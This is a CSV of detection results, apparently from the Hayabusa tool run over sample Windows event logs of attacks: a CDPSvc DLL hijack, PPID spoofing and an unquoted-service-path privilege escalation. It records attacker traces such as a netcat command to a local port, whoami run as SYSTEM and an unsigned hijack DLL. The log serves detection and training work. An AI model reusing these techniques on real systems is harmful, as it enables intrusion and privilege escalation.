2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:56.078 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - CDPSvc | Image: C:\ProgramData\chocolatey\bin\cdpsgshims.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00 | Hash: SHA1=B3314F0EEBBB88A8AC5CF790A706B65F962A3722,MD5=3C0D53F2A6341F6D793B1EB114E6FBF6,SHA256=CCCE37A8276ACE489A237A31181DF7E2B6F58D576C2410DE0A9C21F9F9937D12,IMPHASH=FE8C6819894B9677BB9D9642B2550AC9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.899 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 4464 | PGUID: 747F3D96-08DA-5E76-0000-001012352E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 3696 | PGUID: 747F3D96-0A33-5E76-0000-0010B8813D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de87 | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:07.872 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2560 | PGUID: 747F3D96-0A48-5E76-0000-001051C83E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:38.828 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | PID: 2744 | PGUID: 747F3D96-0880-5E76-0000-001014202B00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-22 06:45:04.908 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f3fff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 4668 | Tgt PGUID: 747F3D96-06AA-5E76-0000-001046E10400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x2de87 | PID: 7708 | PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
2020-03-22 06:45:04.923 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 7708 | Tgt PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 404 | PGUID: 747F3D96-8AEC-5E76-0000-00101DDB8003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4792 | PGUID: 747F3D96-8AEC-5E76-0000-0010AAE38003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,high,Persis,Creation Exe for Service with Unquoted Path,,rules/sigma/file_event/win_fe_creation_unquoted_service_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - Potential PrivEsc via unquoted Service | Path: C:\program.exe | Process: C:\Windows\system32\cmd.exe | PID: 5712 | PGUID: 747F3D96-B521-5EA4-0000-00108C171300,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 6244 | PGUID: 747F3D96-B754-5EA4-0000-00104F0A2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4484 | PGUID: 747F3D96-B755-5EA4-0000-0010D06E2500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 300 | PGUID: 747F3D96-B75F-5EA4-0000-0010622C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \??\C:\Windows\system32\autochk.exe * | Process: C:\Windows\System32\autochk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 328 | PGUID: 747F3D96-B762-5EA4-0000-00108B3C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-B763-5EA4-0000-00106A480000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 396 | PGUID: 747F3D96-B763-5EA4-0000-001034490000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 460 | PGUID: 747F3D96-B764-5EA4-0000-0010794D0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 468 | PGUID: 747F3D96-B764-5EA4-0000-0010904D0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 476 | PGUID: 747F3D96-B764-5EA4-0000-0010714E0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 568 | PGUID: 747F3D96-B764-5EA4-0000-001096530000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 584 | PGUID: 747F3D96-B764-5EA4-0000-00106F550000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 616 | PGUID: 747F3D96-B764-5EA4-0000-001075590000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 732 | PGUID: 747F3D96-B764-5EA4-0000-00105B6C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 808 | PGUID: 747F3D96-B764-5EA4-0000-0010FE6F0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 992 | PGUID: 747F3D96-B764-5EA4-0000-0010DEBF0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""dwm.exe"" | Process: C:\Windows\System32\dwm.exe | User: Window Manager\DWM-1 | Parent Cmd: winlogon.exe | LID: 0xbff6 | PID: 1000 | PGUID: 747F3D96-B764-5EA4-0000-001035C00000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1020 | PGUID: 747F3D96-B764-5EA4-0000-00105FC20000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 636 | PGUID: 747F3D96-B764-5EA4-0000-0010EAC90000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1104 | PGUID: 747F3D96-B764-5EA4-0000-0010A5D20000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 747F3D96-B765-5EA4-0000-001032D70000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1212 | PGUID: 747F3D96-B765-5EA4-0000-001089DD0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1240 | PGUID: 747F3D96-B765-5EA4-0000-0010DCDF0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1308 | PGUID: 747F3D96-B765-5EA4-0000-00109FE80000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1360 | PGUID: 747F3D96-B765-5EA4-0000-00104FEE0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 | Process: C:\Windows\System32\upfc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1380 | PGUID: 747F3D96-B765-5EA4-0000-00107DF10000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1500 | PGUID: 747F3D96-B765-5EA4-0000-0010EDFC0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1536 | PGUID: 747F3D96-B765-5EA4-0000-001055010100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1616 | PGUID: 747F3D96-B765-5EA4-0000-0010550A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1624 | PGUID: 747F3D96-B765-5EA4-0000-00108B0A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1640 | PGUID: 747F3D96-B765-5EA4-0000-0010EA0A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1676 | PGUID: 747F3D96-B765-5EA4-0000-00102B0F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1780 | PGUID: 747F3D96-B765-5EA4-0000-001028190100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
